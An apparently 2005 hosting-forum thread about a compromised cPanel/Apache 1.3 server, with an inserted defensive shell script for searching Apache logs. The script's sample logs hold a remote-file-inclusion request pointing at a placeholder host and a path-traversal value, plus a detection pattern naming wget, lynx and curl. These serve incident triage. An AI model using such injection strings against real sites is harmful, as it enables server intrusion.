The Community Forums


apache / easyapache / buildapache2

Discussion in 'EasyApache' started by afraser, Jan 7, 2005.

  1. afraser

    afraser Member

    Joined:
    Jan 7, 2005
    Messages:
    5
    Likes Received:
    0
    Trophy Points:
    1
    Guys,

    I'm getting SLAMMED by some stinker who's exploiting my 1.3.3 installation. I was able to fairly easily upgrade my PHP install, and I even became bold enough to click the radio button that says "Apache 2 Support (Experimental & Very Broken, Not for Production Use)"

    Man, it worked perfectly from an install perspective. Just like I had done it myself a thousand times, all the sudden there was a capable install in /usr/local/apache2.

    Problem was, it had nothing to do with cpanel or any of that. My "restart" apache WHM button was pointing to /usr/local/apache/bin/, my rc2.d files were unchanged, and of course, my /usr/local/apache2/conf/httpd.conf file was straight out of the box. {No entries for any of my domains or any of that.}

    I noticed a few buildapache files up there with that magic number 2 next to them on:
    http://layer1.cpanel.net/

    Can I just edit my easyapache script to point to something else and tie it all together? Is this in release yet, anywhere? To my defenseless apache server, it's sort of important.


    BTW, I tried to report the exploit to security@apache.org and they laughed me out of the web. Told me to go upgrade and learn unix basically. Can't say I disagree with him. I haven't used 1.3.x in several years, before this install that is.



    tony fraser
    http://www.dakotaplanet.com
     
  2. bking

    bking Well-Known Member

    Joined:
    Mar 1, 2004
    Messages:
    206
    Likes Received:
    1
    Trophy Points:
    18
    Location:
    Sydney
    Do you mind telling us what exploit it is/was? :)
     
  3. afraser

    afraser Member

    Joined:
    Jan 7, 2005
    Messages:
    5
    Likes Received:
    0
    Trophy Points:
    1
  4. haze

    haze Well-Known Member

    Joined:
    Dec 21, 2001
    Messages:
    1,550
    Likes Received:
    3
    Trophy Points:
    38
    1. I'd stick with 1.3.33 rather than go up to 2, it's VERY broken.
    2. You were probably attacked via a vulnerable php script. You might want to do an audit on any php scripts installed by yourself or clients. You really should hire someone if you don't feel capable enough managing your server. There are many steps you can take to help prevent this sort of thing from happening. I mean who knows what's installed on the server right now that you don't know about.
     
  5. philb

    philb Well-Known Member

    Joined:
    Jan 28, 2004
    Messages:
    116
    Likes Received:
    0
    Trophy Points:
    16
    This is correct. You are extremely unlikely to be actually suffering apache exploits. I'd check your server for out of date phpBB (and phpnuke) installations as this is much more likely to be the source of the exploits.

    Specifically the problem lies with viewtopic.php files in phpBB installations predating 18/11/2004.
     
  6. afraser

    afraser Member

    Joined:
    Jan 7, 2005
    Messages:
    5
    Likes Received:
    0
    Trophy Points:
    1
    Apache 2 itself is most definitely not very broken. I hope you guys who say that are talking about the way CPanel rolls it out, not the web server itself. [Not just you, but even that little cpanel deal that makes apache2 look like beta software.]

    I'm going to be a little humble here and agree with you on your point about hiring somebody. I really don't know how to get cpanel to upgrade apache to Apache 2. Though it would sound crazy, if I'd not have tried cpanel and just continued to work servers by hand, I would have long since recompiled apache, patched it, and pushed it out again already. Part of me is kicking myself, but a bigger part of me likes to not have to spend time doing those sorts of things anymore.


    The viewtopic.php worm is altogether different. I am not at risk for that. It's not a nuke exploit, I don't even have it installed.


    Yes, I've combed through my entire file system, looked for modified or swapped files, etc. The only files in my filesystem that did not belong were those listed in that other post. I've also combed through every entry in all web logs, by hand. [Yes, I've been staring at this for five days straight now] There's simply nothing unusual in terms of posting to php like you'd expect for a standard buffer overload php exploit.


    It's not like my software's not up to date with cpanel or that I haven't done all my upgrades. Given the way it happened, it just looks like a good old fashioned apache exploit regardless of the specifics of how it was executed. There really aren't many things that you can do here other than search bugzilla, check for patch upgrades, and make sure your apache's more recent than the one the guy just cracked.

    Given it was a hijacked thread in the first place (as implied in my other post), you can't blame a guy for wanting to get apache into a different threading model.


    tony fraser
     
    #6 afraser, Jan 8, 2005
    Last edited: Jan 8, 2005
  7. haze

    haze Well-Known Member

    Joined:
    Dec 21, 2001
    Messages:
    1,550
    Likes Received:
    3
    Trophy Points:
    38
    I should have been a little more clear. What I meant is that cpanel and apache2 don't get along very well together. I've nothing against apache's httpd2, it's a very nice piece of arse :)

    To be honest it doesn't have the markings of the phpBB exploit ( unless it's a variant I haven't seen ). I have however seen this sort of thing happen over and over again with clients' machines that I'm left to pick the pieces up for. The fact that the files are owned by nobody is the first sign it's been uploaded or crafted by apache. Second, if you're not using phpsuexec on this machine then all php files will have the ownership of nobody. If it was a perl script that uploaded the file ( assuming you have suexec on.. which we all should really ) the file would be owned by that user. Either way, apache can't install a file on its own. There needs to be another entry point there, that's where the php script comes into play. It's usually a 3rd party script, or a script you might have written and given out with source.

    I'm not sure how long ago this happened but you may want to grep your apache domlogs ( in /usr/local/apache/domlogs/domain.com or * for wildcard with few sites ) for things such as the filenames of the files you found as well as tools such as wget, lynx, etc. Though depending on your setup those logs may long be gone.
     
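The two checks haze describes above (grep the domlogs for the dropped file names and for download tools, and look for web-writable files owned by the Apache user) as a small script. This is an added example, not code from the thread or from cPanel's tooling; the log lines, the docroot, and the file name `dropped.pl` are constructed for the demo, and `/usr/local/apache/domlogs/<domain>` is only mentioned because haze names it as the real log location.

```shell
#!/bin/sh
# Added example: triage helpers for the two signs haze describes.
# Everything under DEMO_DIR is constructed so the script runs offline.

DEMO_DIR=$(mktemp -d)
SAMPLE_LOG="$DEMO_DIR/domlog.sample"   # stands in for /usr/local/apache/domlogs/<domain>
DEMO_ROOT="$DEMO_DIR/docroot"          # stands in for a site's document root

# Constructed Apache "combined" log lines. Lines 2 and 3 show the pattern haze
# means: a script parameter pointing at a remote file, fetched by a download
# tool, followed by a reference to the file that later turned up on disk.
cat > "$SAMPLE_LOG" <<'EOF'
203.0.113.5 - - [07/Jan/2005:03:12:01 -0600] "GET /index.php HTTP/1.0" 200 512 "-" "Mozilla/4.0"
203.0.113.9 - - [07/Jan/2005:03:14:22 -0600] "GET /gallery/view.php?img=http://198.51.100.7/x.txt? HTTP/1.0" 200 88 "-" "Wget/1.9"
203.0.113.9 - - [07/Jan/2005:03:14:40 -0600] "GET /gallery/view.php?img=../../../../tmp/dropped.pl HTTP/1.0" 200 88 "-" "lynx/2.8"
203.0.113.5 - - [07/Jan/2005:03:20:15 -0600] "POST /clients/login.php HTTP/1.0" 302 0 "-" "Mozilla/4.0"
EOF

# Terms to look for: download tools haze names, plus the names of the foreign
# files found on disk. 'dropped.pl' is a constructed placeholder for those.
SUSPECT_TERMS='wget|lynx|curl|dropped\.pl'

# Print every log line whose request or user-agent mentions a suspect term.
# Case-insensitive, because user-agents and injected URLs vary in case.
scan_domlog() {
    grep -Ei "$SUSPECT_TERMS" "$1"
}

# Number of matching lines, for a per-domain triage summary.
count_suspect() {
    scan_domlog "$1" | wc -l | tr -d ' '
}

# Files under a docroot owned by the web server user ("nobody" on cPanel
# without phpsuexec). Those were written by Apache, not by a shell user.
# Usage: find_owned_by_web_user <docroot> <user>
find_owned_by_web_user() {
    find "$1" -type f -user "$2" 2>/dev/null
}

# Demo docroot with one planted file. The demo cannot chown to 'nobody'
# without root, so it checks for files owned by the current user instead;
# on a real server pass 'nobody' (or whatever your Apache runs as).
mkdir -p "$DEMO_ROOT/gallery"
: > "$DEMO_ROOT/gallery/dropped.pl"

echo "== suspect requests in $SAMPLE_LOG =="
scan_domlog "$SAMPLE_LOG"
echo "== suspect line count: $(count_suspect "$SAMPLE_LOG") =="
echo "== files owned by $(id -un) under $DEMO_ROOT =="
find_owned_by_web_user "$DEMO_ROOT" "$(id -un)"
```

On a live box you would point `scan_domlog` at each file in `/usr/local/apache/domlogs/` and `find_owned_by_web_user` at each docroot with `nobody` as the user; the request that fetched the file and the file's owner together usually identify the script that served as the entry point.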
  8. philb

    philb Well-Known Member

    Joined:
    Jan 28, 2004
    Messages:
    116
    Likes Received:
    0
    Trophy Points:
    16
    Unless you're running something like slashdot, the people who are actually any good at breaking into systems won't waste their 0-day exploits on you.

    If it was an apache hole, it would almost certainly be all over secfocus/bugtraq by now and/or hundreds of people would be getting hit.
     
  9. afraser

    afraser Member

    Joined:
    Jan 7, 2005
    Messages:
    5
    Likes Received:
    0
    Trophy Points:
    1
    Thank you so much Haze. That was the sort of answer I was hoping to hear from this board. There does have to be an entry point, and it is through the front end.

    Nearly all the code on this server, except of course cpanel itself, was written by me. Apache DOES upload files to my server, that's sort of the basis of most of the clients I work with, dynamic uploadable and configurable content, everything from movies to client data all through POST variables, all custom. And of course, if it's not the right mime type, it's discarded and an error is sent back to the client that the upload failed.

    On the other hand, you have to be authenticated to even see a submit button, and you have to physically type in a hidden URL to get to that login screen anyway. It can't really get any more obscure than that.

    Other than a 'post' comment on my phpgallery page, and login/password screens for all my clients, there's really no other post buttons on my server to unauthenticated users. And, I did go check all the 'post' requests around the time of break in. There wasn't even anything posted around then.

    There's no perl CGI scripts anywhere, nor are there any ASP pages anywhere. (ASP sucks) I do have a BB on the system, but it's not linked anywhere nor has it ever even been viewed by the outside world, except for me when I installed it. But of course, I did apply the patch immediately like any good admin would.


    I just don't think it's a POST trojan...
    Maybe a GET on gallery??
    What do you think?


    I didn't see anything unusual on GETs either.




    tony fraser
     